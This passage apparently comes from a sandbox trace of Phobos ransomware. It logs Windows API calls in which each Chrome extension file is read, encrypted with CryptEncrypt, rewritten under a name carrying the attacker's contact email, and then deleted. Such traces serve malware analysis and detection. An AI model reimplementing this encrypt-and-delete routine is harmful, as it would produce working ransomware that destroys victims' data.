halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.211] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.211] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.211] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5f, lpOverlapped=0x0) returned 1 [0152.211] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0152.211] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x60, lpOverlapped=0x0) returned 1 [0152.212] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0152.212] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.212] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30, dwBufLen=0x30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30) returned 1 [0152.212] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.212] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe2, lpOverlapped=0x0) returned 1 [0152.213] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.213] CloseHandle (hObject=0x148) returned 1 [0152.213] CloseHandle (hObject=0x188) returned 1 [0152.213] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js")) returned 1 [0152.214] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0152.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.214] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=726) returned 1 [0152.214] CloseHandle (hObject=0x188) returned 1 [0152.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json")) returned 0x2020 [0152.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.214] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.214] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.215] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.215] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.215] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2d6, lpOverlapped=0x0) returned 1 [0152.270] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2e0, dwBufLen=0x2e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2e0) returned 1 [0152.270] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2e0, lpOverlapped=0x0) returned 1 [0152.271] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0152.271] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.271] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0152.271] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.271] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0152.271] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.271] CloseHandle (hObject=0x188) returned 1 [0152.271] CloseHandle (hObject=0x148) returned 1 [0152.271] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json")) returned 1 [0152.272] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0152.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.273] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=229) returned 1 [0152.273] CloseHandle (hObject=0x148) returned 1 [0152.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json")) returned 0x2020 [0152.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.273] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.273] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.274] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.274] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.274] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe5, lpOverlapped=0x0) returned 1 [0152.274] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0152.274] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0152.275] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0152.275] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.275] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0152.275] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.275] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0152.275] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.275] CloseHandle (hObject=0x148) returned 1 [0152.275] CloseHandle (hObject=0x188) returned 1 [0152.276] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json")) returned 1 [0152.277] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0152.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.277] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=229) returned 1 [0152.277] CloseHandle (hObject=0x188) returned 1 [0152.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json")) returned 0x2020 [0152.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.277] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.278] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.278] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.278] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.278] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.278] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe5, lpOverlapped=0x0) returned 1 [0152.279] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0152.279] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0152.281] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0152.281] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.281] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0152.281] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.281] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0152.281] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.281] CloseHandle (hObject=0x188) returned 1 [0152.281] CloseHandle (hObject=0x148) returned 1 [0152.281] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json")) returned 1 [0152.282] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0152.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.283] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=226) returned 1 [0152.283] CloseHandle (hObject=0x148) returned 1 [0152.283] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json")) returned 0x2020 [0152.283] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.283] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.283] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.284] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.284] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.284] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe2, lpOverlapped=0x0) returned 1 [0152.285] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0152.285] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0152.285] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0152.286] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.286] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0152.286] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.286] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0152.286] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.286] CloseHandle (hObject=0x148) returned 1 [0152.286] CloseHandle (hObject=0x188) returned 1 [0152.286] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 